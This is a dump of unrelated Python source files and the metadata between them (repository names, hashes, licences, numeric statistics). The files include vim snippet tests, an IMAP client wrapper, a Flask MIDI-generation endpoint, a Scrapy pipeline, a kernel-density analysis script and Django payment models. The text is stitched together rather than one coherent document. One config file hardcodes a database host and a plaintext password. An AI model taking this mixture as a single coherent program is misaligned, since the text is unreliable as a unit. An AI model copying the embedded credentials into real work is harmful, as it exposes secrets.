class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWOChoose(_VimTest):
snippets = (
("test it", "Expand me!", "", "b"),
("test it", "not at beginning", "", ""),
)
keys = " test it" + EX + "1\n"
wanted = " Expand me!"
class MultiWord_SnippetOptions_ExpandInwordSnippets_SimpleExpand(_VimTest):
snippets = (("test it", "Expand me!", "", "i"),)
keys = "atest it" + EX
wanted = "aExpand me!"
class MultiWord_SnippetOptions_ExpandInwordSnippets_ExpandSingle(_VimTest):
snippets = (("test it", "Expand me!", "", "i"),)
keys = "test it" + EX
wanted = "Expand me!"
class _MultiWord_SnippetOptions_ExpandWordSnippets(_VimTest):
snippets = (("test it", "Expand me!", "", "w"),)
class MultiWord_SnippetOptions_ExpandWordSnippets_NormalExpand(
_MultiWord_SnippetOptions_ExpandWordSnippets
):
keys = "test it" + EX
wanted = "Expand me!"
class MultiWord_SnippetOptions_ExpandWordSnippets_NoExpand(
_MultiWord_SnippetOptions_ExpandWordSnippets
):
keys = "atest it" + EX
wanted = "atest it" + EX
class MultiWord_SnippetOptions_ExpandWordSnippets_ExpandSuffix(
_MultiWord_SnippetOptions_ExpandWordSnippets
):
keys = "a-test it" + EX
wanted = "a-Expand me!"
| 25.360882 | 86 | 0.647078 | 1,079 | 9,206 | 5.270621 | 0.118628 | 0.068929 | 0.086865 | 0.063478 | 0.754 | 0.691929 | 0.581502 | 0.540355 | 0.488483 | 0.452963 | 0 | 0.005164 | 0.20063 | 9,206 | 362 | 87 | 25.430939 | 0.767631 | 0.00391 | 0 | 0.531915 | 0 | 0 | 0.190224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025532 | false | 0 | 0.012766 | 0 | 0.795745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ff236eea364203b4294e15e6410629f2aeb3886 | 3,143 | py | Python | imap_wrapper.py | tbrownaw/rss-imap | 41d930d778017a9d60feed1688f9f2c7a94b94a6 | [
"MIT"
] | 2 | 2016-09-28T19:44:53.000Z | 2021-09-17T11:36:24.000Z | imap_wrapper.py | tbrownaw/rss-imap | 41d930d778017a9d60feed1688f9f2c7a94b94a6 | [
"MIT"
] | null | null | null | imap_wrapper.py | tbrownaw/rss-imap | 41d930d778017a9d60feed1688f9f2c7a94b94a6 | [
"MIT"
] | null | null | null | import email
import logging
import re
from imapclient import IMAPClient
class IMAPError(IOError):
pass
class ImapWrapper:
"""A wrapper around imaplib, since that's a bit
lower-level than I'd prefer to work with."""
#This regex is:
# list of flags in parens
# quoted delimiter
# possible-quoted folder name
list_matcher = re.compile(r'^\(([^()]*)\) "([^"]*)" (([^" ]+)|"([^"]*)")$')
def __init__(self, host, user, pw, **kwargs):
"""kwargs: Paassed through to IMAPClient"""
self.M = IMAPClient(host, **kwargs)
self.M.login(user, pw)
self._selected_folder = None
self._update_folders()
def logout(self):
self.M.logout()
def _update_folders(self):
listing = self.M.list_folders()
self.folder_list = [name for (flags, delim, name) in listing]
def ensure_folder(self, name):
"""Return True if the folder was created, False if it already existed."""
l = logging.getLogger(__name__)
search_name = name[:-1] if name.endswith('/') else name
if not any(n == search_name for n in self.folder_list):
rslt = self.M.create_folder(name)
l.info(f"Folder create result: {rslt}")
self.folder_list.append(search_name)
return True
else:
return False
def fetch_messages(self, folder, *search_args):
l = logging.getLogger(__name__)
ret = []
self.select_folder(folder)
message_ids = self.M.search(search_args)
message_dict = self.M.fetch(message_ids, 'RFC822')
for msg in message_dict.values():
l.debug("Got message: %s", msg)
msg = email.message_from_string(msg[b'RFC822'].decode('UTF-8'))
ret.append(msg)
return ret
def check_folder_for_message_ids(self, folder, msgids):
self.select_folder(folder)
search_ids = []
for msgid in msgids:
if len(search_ids) > 0:
search_ids.insert(0, 'OR')
search_ids.append(['HEADER', 'Message-Id', msgid])
message_numbers = self.M.search(['NOT', 'DELETED', search_ids])
message_envelopes = self.M.fetch(message_numbers, 'ENVELOPE')
have_ids = []
for msgdata in message_envelopes.values():
envelope = msgdata[b'ENVELOPE']
have_ids.append(envelope.message_id)
return have_ids
def append(self, folder_name, email):
response = self.M.append(folder_name, str(email).encode('utf-8'))
logging.getLogger(__name__).debug("Append response: %s", response)
# FIXME sets the context folder
def select_folder(self, name):
if self._selected_folder == name:
return
dtl = self.M.select_folder(name)
logging.getLogger(__name__).debug("select_folder = %s", dtl)
self._selected_folder = name
def create_subscribe_folder(self, name):
created = self.ensure_folder(name)
if created:
res = self.M.subscribe_folder(name)
logging.getLogger(__name__).debug("Subscribe result: %s", res)
| 34.538462 | 81 | 0.610563 | 392 | 3,143 | 4.688776 | 0.334184 | 0.032644 | 0.054407 | 0.040805 | 0.038085 | 0.038085 | 0 | 0 | 0 | 0 | 0 | 0.00477 | 0.266306 | 3,143 | 90 | 82 | 34.922222 | 0.792281 | 0.097359 | 0 | 0.059701 | 0 | 0 | 0.075391 | 0 | 0 | 0 | 0 | 0.011111 | 0 | 1 | 0.134328 | false | 0.014925 | 0.059701 | 0 | 0.313433 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ff60de2cd7ad626ba0327a1b10d9c7e29a27101 | 3,150 | py | Python | serve/api/predict.py | HalleyYoung/musicautobot | 075afba70a57ebacfcd8d2bf9dc178a93c05a116 | [
"MIT"
] | 402 | 2019-07-31T00:37:10.000Z | 2022-03-27T22:21:29.000Z | serve/api/predict.py | HalleyYoung/musicautobot | 075afba70a57ebacfcd8d2bf9dc178a93c05a116 | [
"MIT"
] | 26 | 2019-08-20T13:44:30.000Z | 2022-01-27T10:42:28.000Z | serve/api/predict.py | HalleyYoung/musicautobot | 075afba70a57ebacfcd8d2bf9dc178a93c05a116 | [
"MIT"
] | 81 | 2019-08-14T06:55:55.000Z | 2022-03-19T09:49:15.000Z | import sys
from . import app
sys.path.append(str(app.config['LIB_PATH']))
from musicautobot.music_transformer import *
from musicautobot.config import *
from flask import Response, send_from_directory, send_file, request, jsonify
from .save import to_s3
import torch
import traceback
torch.set_num_threads(4)
data = load_data(app.config['DATA_PATH'], app.config['DATA_SAVE_NAME'], num_workers=1)
learn = music_model_learner(data, pretrained_path=app.config['MUSIC_MODEL_PATH'])
if torch.cuda.is_available(): learn.model.cuda()
# learn.to_fp16(loss_scale=512) # fp16 not supported for cpu - https://github.com/pytorch/pytorch/issues/17699
@app.route('/predict/midi', methods=['POST'])
def predict_midi():
args = request.form.to_dict()
midi = request.files['midi'].read()
print('THE ARGS PASSED:', args)
bpm = float(args['bpm']) # (AS) TODO: get bpm from midi file instead
temperatures = (float(args.get('noteTemp', 1.2)), float(args.get('durationTemp', 0.8)))
n_words = int(args.get('nSteps', 200))
seed_len = int(args.get('seedLen', 12))
# debugging 1 - send exact midi back
# with open('/tmp/test.mid', 'wb') as f:
# f.write(midi)
# return send_from_directory('/tmp', 'test.mid', mimetype='audio/midi')
# debugging 2 - test music21 conversion
# stream = file2stream(midi) # 1.
# debugging 3 - test npenc conversion
# seed_np = midi2npenc(midi) # music21 can handle bytes directly
# stream = npenc2stream(seed_np, bpm=bpm)
# debugging 4 - midi in, convert, midi out
# stream = file2stream(midi) # 1.
# midi_in = Path(stream.write("musicxml"))
# print('Midi in:', midi_in)
# stream_sep = separate_melody_chord(stream)
# midi_out = Path(stream_sep.write("midi"))
# print('Midi out:', midi_out)
# s3_id = to_s3(midi_out, args)
# result = {
# 'result': s3_id
# }
# return jsonify(result)
# Main logic
try:
full = predict_from_midi(learn, midi=midi, n_words=n_words, seed_len=seed_len, temperatures=temperatures)
stream = separate_melody_chord(full.to_stream(bpm=bpm))
midi_out = Path(stream.write("midi"))
print('Wrote to temporary file:', midi_out)
except Exception as e:
traceback.print_exc()
return jsonify({'error': f'Failed to predict: {e}'})
s3_id = to_s3(midi_out, args)
result = {
'result': s3_id
}
return jsonify(result)
# return send_from_directory(midi_out.parent, midi_out.name, mimetype='audio/midi')
# @app.route('/midi/song/<path:sid>')
# def get_song_midi(sid):
# return send_from_directory(file_path/data_dir, htlist[sid]['midi'], mimetype='audio/midi')
@app.route('/midi/convert', methods=['POST'])
def convert_midi():
args = request.form.to_dict()
if 'midi' in request.files:
midi = request.files['midi'].read()
elif 'midi_path'in args:
midi = args['midi_path']
stream = file2stream(midi) # 1.
# stream = file2stream(midi).chordify() # 1.
stream_out = Path(stream.write('musicxml'))
return send_from_directory(stream_out.parent, stream_out.name, mimetype='xml')
| 35 | 113 | 0.672381 | 442 | 3,150 | 4.61991 | 0.332579 | 0.03428 | 0.041626 | 0.045054 | 0.129285 | 0.105779 | 0.052889 | 0.052889 | 0.052889 | 0.052889 | 0 | 0.018626 | 0.181905 | 3,150 | 89 | 114 | 35.393258 | 0.773768 | 0.365714 | 0 | 0.088889 | 0 | 0 | 0.119837 | 0 | 0 | 0 | 0 | 0.011236 | 0 | 1 | 0.044444 | false | 0.022222 | 0.177778 | 0 | 0.288889 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ffc37d2645887ce4dd7940f03465b3689f39751 | 458 | py | Python | nngen/onnx/shape.py | RyusukeYamano/nngen | 9ed1f7fb83908794aa94d70287d89545d45fe875 | [
"Apache-2.0"
] | 207 | 2019-11-12T11:42:25.000Z | 2022-03-20T20:32:17.000Z | nngen/onnx/shape.py | RyusukeYamano/nngen | 9ed1f7fb83908794aa94d70287d89545d45fe875 | [
"Apache-2.0"
] | 31 | 2019-11-25T07:33:30.000Z | 2022-03-17T12:34:34.000Z | nngen/onnx/shape.py | RyusukeYamano/nngen | 9ed1f7fb83908794aa94d70287d89545d45fe875 | [
"Apache-2.0"
] | 29 | 2019-11-07T02:25:48.000Z | 2022-03-12T16:22:57.000Z | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
def Shape(visitor, node):
input = visitor.visit(node.input[0])
shape = input.shape
if (input.get_layout() is not None and input.get_onnx_layout() is not None and
input.get_layout() != input.get_onnx_layout()):
shape = [shape[input.get_layout().index(l)] for l in input.get_onnx_layout()]
return tuple(shape)
| 28.625 | 85 | 0.713974 | 67 | 458 | 4.537313 | 0.41791 | 0.157895 | 0.157895 | 0.177632 | 0.171053 | 0.171053 | 0.171053 | 0 | 0 | 0 | 0 | 0.002681 | 0.18559 | 458 | 15 | 86 | 30.533333 | 0.812332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b502452c7fbc49bc12b35532d369cf96f4db27dd | 851 | py | Python | twisted/test/stdio_test_write.py | engdan77/otis_app | 6c6ea8da47d580e91a794663338572cf2a7368b6 | [
"MIT"
] | null | null | null | twisted/test/stdio_test_write.py | engdan77/otis_app | 6c6ea8da47d580e91a794663338572cf2a7368b6 | [
"MIT"
] | 1 | 2022-03-04T17:40:22.000Z | 2022-03-04T17:40:22.000Z | twisted/test/stdio_test_write.py | cpdean/twisted | e502df17e0704de42dc38b6e171ebbc7daf52c8a | [
"Unlicense",
"MIT"
] | null | null | null | # -*- test-case-name: twisted.test.test_stdio.StandardInputOutputTests.test_write -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Main program for the child process run by
L{twisted.test.test_stdio.StandardInputOutputTests.test_write} to test that
ITransport.write() works for process transports.
"""
__import__('_preamble')
import sys
from twisted.internet import stdio, protocol
from twisted.python import reflect
class WriteChild(protocol.Protocol):
def connectionMade(self):
for ch in 'ok!':
self.transport.write(ch)
self.transport.loseConnection()
def connectionLost(self, reason):
reactor.stop()
if __name__ == '__main__':
reflect.namedAny(sys.argv[1]).install()
from twisted.internet import reactor
stdio.StandardIO(WriteChild())
reactor.run()
| 25.787879 | 85 | 0.72738 | 102 | 851 | 5.901961 | 0.54902 | 0.054817 | 0.049834 | 0.066445 | 0.17608 | 0.17608 | 0.17608 | 0 | 0 | 0 | 0 | 0.001406 | 0.164512 | 851 | 32 | 86 | 26.59375 | 0.845288 | 0.374853 | 0 | 0 | 0 | 0 | 0.038314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.3125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b50af19fbfd3dbcdc0b721d01520bacb09232597 | 256 | py | Python | web.backend/config.py | Forevka/YTDownloader | fff92bfc13b70843472ec6cce13ed6609d89433a | [
"MIT"
] | 1 | 2020-10-27T05:31:51.000Z | 2020-10-27T05:31:51.000Z | web.backend/config.py | Forevka/YTDownloader | fff92bfc13b70843472ec6cce13ed6609d89433a | [
"MIT"
] | null | null | null | web.backend/config.py | Forevka/YTDownloader | fff92bfc13b70843472ec6cce13ed6609d89433a | [
"MIT"
] | null | null | null | host = "localhost"
port = 9999
dboptions = {
"host": "194.67.198.163",
"user": "postgres",
"password": "werdwerd2012",
"database": "zno_bot",
'migrate': True
}
API_PATH = '/api/'
API_VERSION = 'v1'
API_URL = API_PATH + API_VERSION
| 14.222222 | 32 | 0.597656 | 31 | 256 | 4.741935 | 0.741935 | 0.095238 | 0.136054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0.21875 | 256 | 17 | 33 | 15.058824 | 0.635 | 0 | 0 | 0 | 0 | 0 | 0.34375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b50dc3fa0e49a34e31b885324c803f179d4c5bd2 | 746 | py | Python | UFOscrapy/UFOscrapy/pipelines.py | anaheino/Ufo-sightings-map | 64af02093f97737cbbdfd8af9e1aeb4d8aa8fcdc | [
"MIT"
] | null | null | null | UFOscrapy/UFOscrapy/pipelines.py | anaheino/Ufo-sightings-map | 64af02093f97737cbbdfd8af9e1aeb4d8aa8fcdc | [
"MIT"
] | null | null | null | UFOscrapy/UFOscrapy/pipelines.py | anaheino/Ufo-sightings-map | 64af02093f97737cbbdfd8af9e1aeb4d8aa8fcdc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .parserules import parseAll
class UfoscrapyPipeline(object):
def process_item(self, item, spider):
"""
Parsitaan regexin ja datetimen avulla kentät oikeaan muotoon.
"""
try:
item['loc'] = item['loc'][0]
except:
item['loc'] = ""
try:
item['shape'] = item['shape'][0]
except:
item['shape'] = ""
try:
item['state'] = item['state'][0]
except:
item['state'] = ""
try:
item['duration'] = item['duration'][0]
except:
item['duration'] = ""
parseAll(item)
return item
| 22.606061 | 66 | 0.430295 | 64 | 746 | 5 | 0.484375 | 0.0875 | 0.1375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011682 | 0.426273 | 746 | 32 | 67 | 23.3125 | 0.735981 | 0.02815 | 0 | 0.380952 | 0 | 0 | 0.097826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.047619 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82ecef2ff3628afa85b6185c93f911d25a8014e1 | 5,635 | py | Python | src/main/python/Training+Data+Analysis.py | sully90/dp-search-service | efc6a94dad1c5b3fc898da9ced1606aa345c7ecd | [
"MIT"
] | null | null | null | src/main/python/Training+Data+Analysis.py | sully90/dp-search-service | efc6a94dad1c5b3fc898da9ced1606aa345c7ecd | [
"MIT"
] | null | null | null | src/main/python/Training+Data+Analysis.py | sully90/dp-search-service | efc6a94dad1c5b3fc898da9ced1606aa345c7ecd | [
"MIT"
] | null | null | null |
# coding: utf-8
# # Training Set Analysis
# The purpose of this notebook is to compute the kernel density estimate of the PDF between the judgement and each feature in a training set, in order to estimate how each feature is performing.
#
# # TODO
# Modify features to use custom function score queries, and use ML to optimise features given the below plot (plot ideal relationship between judgement and features, and optimise to get as close as possible).
# In[51]:
import sys
import numpy as np
import scipy
from scipy import stats
import matplotlib.pylab as plt
models_dir = "/Users/sullid/ONS/dp-search-service/src/main/resources/elastic.ltr/models"
model_name = sys.argv[1]
# In[52]:
class TrainingData(object):
"""
Class to handle the loading of training sets
"""
def __init__(self, model_dir, model_name):
self.model_dir = model_dir
self.model_name = model_name
self.data = {}
self.load()
def load(self):
fname = "%s/%s/ons_train.txt" % (self.model_dir, self.model_name)
with open(fname, 'r') as f:
lines = f.readlines()
qid_dict = {}
# First collect the qids
for line in lines:
parts = line.split("\t")
qid_part = parts[1]
qid = int(qid_part.split(":")[1])
if (qid not in qid_dict):
qid_dict[qid] = []
qid_dict[qid].append(line)
# Process each line by the qid
for qid in qid_dict.keys():
lines = qid_dict[qid]
self.data[qid] = {}
for line in lines:
if (line.startswith("#")):
continue
parts = line.split("\t")
if (len(parts) > 0):
for part in parts:
if ('#' in part):
part = part[0:part.index("#")].strip()
key = "J"
val = 0.0
if (":" in part):
key = part.split(":")[0]
val = float(part.split(":")[-1])
else:
val = float(part)
if (key not in self.data[qid]):
self.data[qid][key] = []
self.data[qid][key].append(val)
def get(self, qid, item):
return np.array(self.data[qid][item])
def qids(self):
return self.data.keys()
def keys(self, qid):
return self.data[qid].keys()
def min(self, qid, item):
return min(self.get(qid, item))
def max(self, item):
return max(self.get(qid, item))
def size(self, qid):
return len(self.get(qid, "J"))
def numFeatures(self, qid):
return len(self.keys(qid)) - 2 # - 2 to account for judgement (J) and qid
trainingData = TrainingData(models_dir, model_name)
# In[56]:
import matplotlib.gridspec as gridspec
import matplotlib.pylab as pylab
fs=25
params = {'legend.fontsize': 'x-large',
'figure.figsize': (15, 5),
'axes.labelsize': fs,
'axes.titlesize':fs,
'xtick.labelsize':fs,
'ytick.labelsize':fs}
pylab.rcParams.update(params)
def getValues(trainingData, qid, i):
if (i == 0):
return "Judgement", trainingData.get(qid, "J")
# elif (i == 1 or i == 9):
# return str(i), np.log10(trainingData[str(i)])
else:
return "Feature %d" % i, trainingData.get(qid, str(i))
def fitKernel(x,y,n=100j):
xmin,xmax,ymin,ymax=(x.min(),x.max(),y.min(),y.max())
X, Y = np.mgrid[xmin:xmax:n, ymin:ymax:n]
positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([x, y])
kernel = stats.gaussian_kde(values)
Z = np.reshape(kernel(positions).T, X.shape)
return np.rot90(Z), (xmin, xmax, ymin, ymax)
def forceAspect(ax,aspect=1):
im = ax.get_images()
extent = im[0].get_extent()
ax.set_aspect(abs((extent[1]-extent[0])/(extent[3]-extent[2]))/aspect)
print "QIDS: ", trainingData.qids()
for qid in trainingData.qids():
numFeatures = trainingData.numFeatures(qid) + 1
fig = plt.figure(figsize=(50, 50))
plt.suptitle('qid:%d' % qid, fontsize=fs*1.5)
gs = gridspec.GridSpec(numFeatures, numFeatures)
for i in range(numFeatures):
rowLabel, rowValues = getValues(trainingData, qid, i)
labelRow = True
for j in range(i+1, numFeatures):
colLabel, colValues = getValues(trainingData, qid, j)
ax = plt.subplot(gs[i,j-numFeatures])
# ax.text(0.25, 0.5, "ax %d:%d" % (i,j))
if (labelRow):
ax.set_ylabel(rowLabel)
labelRow = False
if (j == (i+1)):
ax.set_xlabel(colLabel)
try:
Z, (xmin,xmax,ymin,ymax) = fitKernel(colValues, rowValues, 200j)
extent = [xmin,xmax,ymin,ymax]
ax.imshow(Z, cmap=plt.cm.gist_stern_r, extent=extent)
ax.set_xlim([xmin, xmax])
ax.set_ylim([ymin, ymax])
forceAspect(ax)
except:
pass
# ax.imshow(np.rot90(Z), cmap=plt.cm.gist_earth_r,
# extent=[xmin, xmax, ymin, ymax], aspect=50)
# ax.plot(x, y, 'k.', markersize=2)
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([ymin, ymax])
plt.show()
| 31.836158 | 208 | 0.525998 | 713 | 5,635 | 4.102384 | 0.31136 | 0.02188 | 0.022564 | 0.02735 | 0.099145 | 0.023248 | 0.023248 | 0.023248 | 0.023248 | 0.023248 | 0 | 0.01646 | 0.342325 | 5,635 | 176 | 209 | 32.017045 | 0.772801 | 0.155989 | 0 | 0.052174 | 0 | 0.008696 | 0.049668 | 0.015628 | 0 | 0 | 0 | 0.005682 | 0 | 0 | null | null | 0.008696 | 0.06087 | null | null | 0.008696 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82efe2ac2a9247e0f62ea4de8994ddbcc198a68c | 368 | py | Python | manage_it/catalog/admin.py | ShangShungInstitute/django-manage-it | 13cb23b57ce3577db7f69250741bcbfe82b69a57 | [
"MIT",
"Unlicense"
] | 1 | 2015-01-20T14:34:32.000Z | 2015-01-20T14:34:32.000Z | manage_it/catalog/admin.py | ShangShungInstitute/django-manage-it | 13cb23b57ce3577db7f69250741bcbfe82b69a57 | [
"MIT",
"Unlicense"
] | null | null | null | manage_it/catalog/admin.py | ShangShungInstitute/django-manage-it | 13cb23b57ce3577db7f69250741bcbfe82b69a57 | [
"MIT",
"Unlicense"
] | null | null | null | from django.contrib import admin
from models import Location, ItemTemplate, Log, Inventory, Supplier
class ItemTemplateAdmin(admin.ModelAdmin):
filter_horizontal = ('supplies', 'suppliers')
admin.site.register(Location)
admin.site.register(ItemTemplate, ItemTemplateAdmin)
admin.site.register(Log)
admin.site.register(Inventory)
admin.site.register(Supplier)
| 24.533333 | 67 | 0.807065 | 42 | 368 | 7.047619 | 0.47619 | 0.152027 | 0.287162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089674 | 368 | 14 | 68 | 26.285714 | 0.883582 | 0 | 0 | 0 | 0 | 0 | 0.046322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82f2ce225147eef11b48a4a976040f87c859485c | 7,566 | py | Python | orchestra/contrib/payments/models.py | udm88/django-orchestra | 49c84f13a8f92427b01231615136549fb5be3a78 | [
"Unlicense"
] | 68 | 2015-02-09T10:28:44.000Z | 2022-03-12T11:08:36.000Z | orchestra/contrib/payments/models.py | ferminhg/django-orchestra | 49c84f13a8f92427b01231615136549fb5be3a78 | [
"Unlicense"
] | 17 | 2015-05-01T18:10:03.000Z | 2021-03-19T21:52:55.000Z | orchestra/contrib/payments/models.py | ferminhg/django-orchestra | 49c84f13a8f92427b01231615136549fb5be3a78 | [
"Unlicense"
] | 29 | 2015-03-31T04:51:03.000Z | 2022-02-17T02:58:50.000Z | from django.core.exceptions import ValidationError
from django.db import models
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from jsonfield import JSONField
from orchestra.models.fields import PrivateFileField
from orchestra.models.queryset import group_by
from . import settings
from .methods import PaymentMethod
class PaymentSourcesQueryset(models.QuerySet):
def get_default(self):
return self.filter(is_active=True).first()
class PaymentSource(models.Model):
account = models.ForeignKey('accounts.Account', verbose_name=_("account"),
related_name='paymentsources')
method = models.CharField(_("method"), max_length=32,
choices=PaymentMethod.get_choices())
data = JSONField(_("data"), default={})
is_active = models.BooleanField(_("active"), default=True)
objects = PaymentSourcesQueryset.as_manager()
def __str__(self):
return "%s (%s)" % (self.label, self.method_class.verbose_name)
@cached_property
def method_class(self):
return PaymentMethod.get(self.method)
@cached_property
def method_instance(self):
""" Per request lived method_instance """
return self.method_class(self)
@cached_property
def label(self):
return self.method_instance.get_label()
@cached_property
def number(self):
return self.method_instance.get_number()
def get_bill_context(self):
method = self.method_instance
return {
'message': method.get_bill_message(),
}
def get_due_delta(self):
return self.method_instance.due_delta
def clean(self):
self.data = self.method_instance.clean_data()
class TransactionQuerySet(models.QuerySet):
group_by = group_by
def create(self, **kwargs):
source = kwargs.get('source')
if source is None or not hasattr(source.method_class, 'process'):
# Manual payments don't need processing
kwargs['state'] = self.model.WAITTING_EXECUTION
amount = kwargs.get('amount')
if amount == 0:
kwargs['state'] = self.model.SECURED
return super(TransactionQuerySet, self).create(**kwargs)
def secured(self):
return self.filter(state=Transaction.SECURED)
def exclude_rejected(self):
return self.exclude(state=Transaction.REJECTED)
def amount(self):
return next(iter(self.aggregate(models.Sum('amount')).values())) or 0
def processing(self):
return self.filter(state__in=[Transaction.EXECUTED, Transaction.WAITTING_EXECUTION])
class Transaction(models.Model):
WAITTING_PROCESSING = 'WAITTING_PROCESSING' # CREATED
WAITTING_EXECUTION = 'WAITTING_EXECUTION' # PROCESSED
EXECUTED = 'EXECUTED'
SECURED = 'SECURED'
REJECTED = 'REJECTED'
STATES = (
(WAITTING_PROCESSING, _("Waitting processing")),
(WAITTING_EXECUTION, _("Waitting execution")),
(EXECUTED, _("Executed")),
(SECURED, _("Secured")),
(REJECTED, _("Rejected")),
)
STATE_HELP = {
WAITTING_PROCESSING: _("The transaction is created and requires processing by the "
"specific payment method."),
WAITTING_EXECUTION: _("The transaction is processed and its pending execution on "
"the related financial institution."),
EXECUTED: _("The transaction is executed on the financial institution."),
SECURED: _("The transaction ammount is secured."),
REJECTED: _("The transaction has failed and the ammount is lost, a new transaction "
"should be created for recharging."),
}
bill = models.ForeignKey('bills.bill', verbose_name=_("bill"),
related_name='transactions')
source = models.ForeignKey(PaymentSource, null=True, blank=True, on_delete=models.SET_NULL,
verbose_name=_("source"), related_name='transactions')
process = models.ForeignKey('payments.TransactionProcess', null=True, blank=True,
on_delete=models.SET_NULL, verbose_name=_("process"), related_name='transactions')
state = models.CharField(_("state"), max_length=32, choices=STATES,
default=WAITTING_PROCESSING)
amount = models.DecimalField(_("amount"), max_digits=12, decimal_places=2)
currency = models.CharField(max_length=10, default=settings.PAYMENT_CURRENCY)
created_at = models.DateTimeField(_("created"), auto_now_add=True)
modified_at = models.DateTimeField(_("modified"), auto_now=True)
objects = TransactionQuerySet.as_manager()
def __str__(self):
return "#%i" % self.id
@property
def account(self):
return self.bill.account
def clean(self):
if not self.pk:
amount = self.bill.transactions.exclude(state=self.REJECTED).amount()
if amount >= self.bill.total:
raise ValidationError(
_("Bill %(number)s already has valid transactions that cover bill total amount (%(amount)s).") % {
'number': self.bill.number,
'amount': amount,
}
)
def get_state_help(self):
if self.source:
return self.source.method_instance.state_help.get(self.state) or self.STATE_HELP.get(self.state)
return self.STATE_HELP.get(self.state)
def mark_as_processed(self):
self.state = self.WAITTING_EXECUTION
self.save(update_fields=('state', 'modified_at'))
def mark_as_executed(self):
self.state = self.EXECUTED
self.save(update_fields=('state', 'modified_at'))
def mark_as_secured(self):
self.state = self.SECURED
self.save(update_fields=('state', 'modified_at'))
def mark_as_rejected(self):
self.state = self.REJECTED
self.save(update_fields=('state', 'modified_at'))
class TransactionProcess(models.Model):
"""
Stores arbitrary data generated by payment methods while processing transactions
"""
CREATED = 'CREATED'
EXECUTED = 'EXECUTED'
ABORTED = 'ABORTED'
COMMITED = 'COMMITED'
STATES = (
(CREATED, _("Created")),
(EXECUTED, _("Executed")),
(ABORTED, _("Aborted")),
(COMMITED, _("Commited")),
)
data = JSONField(_("data"), blank=True)
file = PrivateFileField(_("file"), blank=True)
state = models.CharField(_("state"), max_length=16, choices=STATES, default=CREATED)
created_at = models.DateTimeField(_("created"), auto_now_add=True, db_index=True)
updated_at = models.DateTimeField(_("updated"), auto_now=True)
class Meta:
verbose_name_plural = _("Transaction processes")
def __str__(self):
return '#%i' % self.id
def mark_as_executed(self):
self.state = self.EXECUTED
for transaction in self.transactions.all():
transaction.mark_as_executed()
self.save(update_fields=('state', 'updated_at'))
